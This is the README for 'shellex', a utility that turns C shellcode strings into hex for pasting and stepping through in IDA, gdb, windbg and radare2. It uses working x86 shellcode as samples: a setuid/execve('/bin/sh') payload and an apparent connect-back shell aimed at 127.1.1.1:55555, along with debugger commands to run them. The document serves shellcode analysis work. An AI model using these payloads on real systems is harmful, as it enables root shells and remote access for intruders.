therealdreg / shellex

Licence: MIT license
C-shellcode to hex converter, a handy tool for pasting & executing shellcodes in IDA PRO, gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor

shellex

WARNING: the ugliest code in the world

C-shellcode to hex converter.

Please consider making a donation: https://github.com/sponsors/therealdreg

Handy tool for pasting & executing shellcodes in IDA PRO, gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor.

Are you having problems converting C shellcodes to hex (maybe with C comments and mixed ASCII)?

Here is shellex. If a C compiler can compile the shellcode, shellex can convert it.

Just execute shellex, paste the shellcode C string and press ENTER.

To finish the input, press Control+Z (Windows) or Control+D (Linux).

Converting a multi-line C shellcode with hex and mixed ASCII (note the mixed part \x68//sh\x68/bin\x89):

"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

shellex output:

6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

Converting a multi-line C shellcode with comments:

"\x68"
"\x7f\x01\x01\x01"  // <- IP:  127.1.1.1
"\x5e\x66\x68"
"\xd9\x03"          // <- Port: 55555
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce"

shellex output:

68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE

Do you need the shellex output back as a C shellcode string? Just use the -h parameter; for example, converting the shellex output above:

./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80
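How the conversion works, as an added Python example that is not shellex's own code (shellex is written in C): a small parser that takes the C source as typed above, ignores comments and declarations outside the string literals, decodes \xHH, octal and bare ASCII inside them, concatenates adjacent literals like a C compiler, and also reverses the result the way shellex -h does. The sample input is constructed from the README's own shellcode; the function and constant names are this example's, not shellex's.

```python
import re

# Constructed sample (not shellex's own code): the README's shellcode wrapped in a
# C declaration, with mixed ASCII inside the escapes and C comments outside them.
SAMPLE = r'''unsigned char sc[] =  /* execve("/bin/sh") */
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";  // end
'''

# Comment alternatives come first, so "//" inside a literal (the "//sh" case) stays data.
TOKEN = re.compile(r'//[^\n]*|/\*.*?\*/|"((?:\\.|[^"\\])*)"', re.S)
ESC = re.compile(r'\\(x[0-9A-Fa-f]+|[0-7]{1,3}|.)', re.S)
SIMPLE = {'n': 10, 't': 9, 'r': 13, 'a': 7, 'b': 8, 'f': 12, 'v': 11, '\\': 92, '"': 34, "'": 39, '?': 63}

def _decode(body: str) -> bytes:
    """Decode one literal body: \\xHH, octal and simple escapes plus bare chars."""
    out, pos = bytearray(), 0
    for m in ESC.finditer(body):
        out += body[pos:m.start()].encode('latin-1')  # plain ASCII run
        esc = m.group(1)
        if esc[0] == 'x':
            val = int(esc[1:], 16)  # C consumes every hex digit, not just two
        elif esc[0] in '01234567':
            val = int(esc, 8)
        elif esc in SIMPLE:
            val = SIMPLE[esc]
        else:
            raise ValueError(f'unknown escape \\{esc}')
        if val > 255:  # a C compiler rejects this too (e.g. "\x6ab")
            raise ValueError(f'escape \\{esc} does not fit in one byte')
        out.append(val)
        pos = m.end()
    return bytes(out + body[pos:].encode('latin-1'))

def c_to_bytes(src: str) -> bytes:
    """Concatenate every C string literal in src (adjacent literals join, as in C)."""
    return b''.join(_decode(m.group(1)) for m in TOKEN.finditer(src)
                    if m.group(1) is not None)

def to_hex(data: bytes) -> str:
    """shellex's default output: upper-case hex bytes separated by spaces."""
    return ' '.join(f'{b:02X}' for b in data)

def to_cstring(hexline: str) -> str:
    """Same job as shellex -h: space-separated hex back to a \\x C string."""
    return ''.join(f'\\x{int(h, 16):02X}' for h in hexline.split())

if __name__ == '__main__':
    hexline = to_hex(c_to_bytes(SAMPLE))
    print(hexline, '\n', to_cstring(hexline))  # 30 bytes, 6A 17 58 ... CD 80
```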

Installation

git clone https://github.com/therealdreg/shellex.git

For Windows:

binary:

shellex\bins\shellex.exe

For Linux:

Dependencies:

sudo apt-get install tcc

binary:

shellex/linuxbins/shellex

Paste & Execute shellcode in ollydbg, x64dbg, immunity debugger

Just use my xshellex plugin:

https://github.com/therealdreg/xshellex

Paste & Execute shellcode in IDA PRO with IDAPYTHON

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • make your own IDAPYTHON Script:
import idc

def writebytes(dest, data):
    # Patch each byte of the C hex string at dest, dest+1, ...
    for i, c in enumerate(data):
        idc.patch_byte(dest + i, ord(c))

address = idc.get_reg_value("eip")

shellcode = "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

writebytes(address, shellcode)

print("done!")
  • Copy the C hex string into the shellcode variable.
  • For 32 bits use: address = idc.get_reg_value("eip")
  • For 64 bits use: address = idc.get_reg_value("rip")

Debug a program in IDA PRO:

  • Go to File -> Script command...
  • In Script language, select Python
  • Paste the IDAPYTHON Script
  • Click Run

Now you can debug the shellcode with F7, but the disassembly window may show the shellcode as db's.

Here is the solution:

  • Select the shellcode bytes in the disasm window
  • Right click -> Undefine
  • Select the shellcode bytes again in the disasm window
  • Right click -> Code -> Force -> Yes

Done! You can view the shellcode disassembled and debug it with F7.

Paste & Execute shellcode in gdb

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String to a file as raw binary data with "echo":
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc
  • gdb /bin/ls
  • starti

Write the binary file to the current instruction pointer:

for 32 bits:

restore /tmp/sc binary $eip
x/30b $eip
x/15i $eip

for 64 bits:

restore /tmp/sc binary $rip
x/30b $rip
x/15i $rip

The 30 in x/30b is the size of the shellcode in bytes; you can get it with:

wc -c /tmp/sc

The 15 in x/15i is the number of instructions to display; you can get the correct number (maybe) with ndisasm:

sudo apt-get install nasm

For 32 bits:

ndisasm -b32 /tmp/sc
ndisasm -b32 /tmp/sc | wc -l

For 64 bits:

ndisasm -b64 /tmp/sc
ndisasm -b64 /tmp/sc | wc -l

Paste & Execute shellcode in gdb-gef

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert with echo and sed (keep the leading space before the shellex output, so the first byte also gets its 0x prefix): echo "SPACE shellex_output" | sed "s/ / 0x/g"
echo " 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80" | sed "s/ / 0x/g"

Use the patch byte command:

For 32 bits:

patch byte $eip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

For 64 bits:

patch byte $rip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

Execute the context command and check that the disassembly is correct.

Paste & Execute shellcode in gdb-peda

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 32 bits:

patch $eip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

For 64 bits:

patch $rip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

Execute the context command and check that the disassembly is correct.

Paste & Execute shellcode in windbg

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D

via eb

For small shellcodes, eb can be fine; just use the shellex output with the eb command (thanks to Axel Souchet @0vercl0k for the hint).

For 32 bits:

eb @eip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 64 bits:

eb @rip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

via file

  • convert the shellex output to raw binary data with certutil:
echo 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 > C:\Users\Dreg\sc.hex
certutil -f -decodeHex c:\Users\Dreg\sc.hex c:\Users\Dreg\sc
del C:\Users\Dreg\sc.hex

certutil output:

Input Length = 92
Output Length = 30
CertUtil: -decodehex command completed successfully.

The length of our shellcode is 30 bytes, so use L0n30 in windbg.

Write the binary file to the current instruction pointer:

for 32 bits:

.readmem C:\Users\Dreg\sc @eip L0n30

for 64 bits:

.readmem C:\Users\Dreg\sc @rip L0n30

Paste & Execute shellcode in radare2

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String in radare2 using the "w" command:

For 32 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @eip

For 64 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @rip

Check that the shellcode was pasted correctly:

Get the size of the shellcode in a terminal with:

echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" | wc -c

The output of the last command is 30; now use the pD command in radare2:

pD 30

Non-interactive mode

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Linux:

echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Windows:

echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe

Via a multi-line file in Windows:

C:\Users\Dreg\Desktop\shellex\bins>type sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe

Via a multi-line file in Linux:

dreg@fr33project# cat sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
dreg@fr33project# cat sc.txt | shellex

Compilation

For Windows, just use Visual Studio 2013.

For Linux, just:

cd shellex/shellex
gcc -o shellex shellex.c
./shellex